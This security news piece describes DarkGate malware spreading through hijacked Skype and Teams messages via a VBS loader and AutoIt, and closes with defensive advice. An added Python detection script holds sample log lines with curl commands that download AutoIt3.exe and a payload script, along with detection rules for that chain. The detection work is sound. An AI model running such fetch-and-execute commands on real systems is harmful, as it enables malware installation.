Hackers utilized the Teams and Skype messaging platforms to spread the DarkGate malware to the targeted businesses. When DarkGate malware is installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.
The Windows-based malware known as DarkGate can provide remote access to target endpoints, encrypt files, mine cryptocurrency, and steal credentials. It was first made public in 2018.
According to Trend Micro, DarkGate attacks were spotted in the Americas, followed closely by Asia, the Middle East, and Africa.
To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.
The attacker simply utilized the hijacked Skype account to hijack an existing conversation thread and send a message that looked like a PDF file but was a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.
The recipient therefore recognized the sender as belonging to a trusted external organization. Researchers observed that, in this case, the curl command was used to retrieve the legitimate AutoIt application and the associated malicious files.
In another instance, the threat was delivered as a link in a Microsoft Teams message. Here the victim was exposed to spam because the organization's Teams configuration allows notifications from external users.
In the Teams version of the attack, the attackers concealed a .LNK file. The sample that abused Teams was sent by an unidentified external sender.
“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
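The chain described above (a script masquerading as a document, curl fetching AutoIt, and a dropped AutoIt3.exe running a compiled script) maps onto process-creation telemetry that defenders can check. The following is an added example, not code from the article or from Trend Micro; the log lines are constructed, and the rule names, the script-host list and the trusted AutoIt directories are assumptions.

```python
import re

# Constructed sample process-creation events (not from the article): each
# entry is "parent_image|image|command_line", mimicking what an EDR agent or
# Sysmon Event ID 1 would record.
SAMPLE_EVENTS = [
    "explorer.exe|wscript.exe|wscript.exe C:\\Users\\bob\\Downloads\\invoice.pdf.vbs",
    "wscript.exe|curl.exe|curl -o C:\\Temp\\AutoIt3.exe http://example.invalid/a",
    "wscript.exe|curl.exe|curl -o C:\\Temp\\job.au3 http://example.invalid/b",
    "wscript.exe|AutoIt3.exe|C:\\Temp\\AutoIt3.exe C:\\Temp\\job.au3",
    "explorer.exe|AutoIt3.exe|C:\\Program Files\\AutoIt3\\AutoIt3.exe build.au3",
    "explorer.exe|curl.exe|curl -o report.json https://example.invalid/api",
]

# Assumed lists: common Windows script hosts and the normal AutoIt install paths.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.(vbs|js|lnk)\b", re.IGNORECASE)
TRUSTED_AUTOIT_DIRS = ("c:\\program files\\autoit3\\", "c:\\program files (x86)\\autoit3\\")


def parse_event(line):
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def check_event(ev):
    """Return the list of rule names that a single event matches."""
    hits = []
    cmd = ev["cmdline"].lower()
    # Rule 1: a script host opening a file that pretends to be a document
    # (e.g. invoice.pdf.vbs), as in the Skype lure described in the article.
    if ev["image"] in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
        hits.append("script_host_double_extension")
    # Rule 2: curl spawned by a script host, or curl writing an executable or
    # an AutoIt script; the loader used curl to fetch AutoIt and its payload.
    if ev["image"] == "curl.exe" and (
        ev["parent"] in SCRIPT_HOSTS or re.search(r"\.(exe|au3)(\s|$)", cmd)
    ):
        hits.append("curl_fetch_from_script_host")
    # Rule 3: AutoIt3.exe started by a script host or from outside its install
    # directory, which is how a dropped copy of the interpreter gets run.
    if ev["image"] == "autoit3.exe" and (
        ev["parent"] in SCRIPT_HOSTS or not cmd.startswith(TRUSTED_AUTOIT_DIRS)
    ):
        hits.append("autoit_outside_install_dir")
    return hits


def scan(lines):
    """Return (index, hits) for every event that matched at least one rule."""
    results = [(i, check_event(parse_event(l))) for i, l in enumerate(lines)]
    return [(i, h) for i, h in results if h]
```

Events 1 to 4 of the constructed sample trip the rules in sequence, while the legitimate AutoIt build and the ordinary curl download do not.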
Cybercriminals may use these payloads to deploy further malware, such as cryptocurrency miners, information stealers, ransomware, and malicious or abusive remote management tools.
Organizations should control instant messaging applications so that rules such as blocking external domains, restricting attachments and, where practical, scanning content can be enforced.
Multifactor authentication (MFA) is strongly advised for securing applications in case legitimate credentials are compromised; it reduces the risk of attacks using these methods spreading further.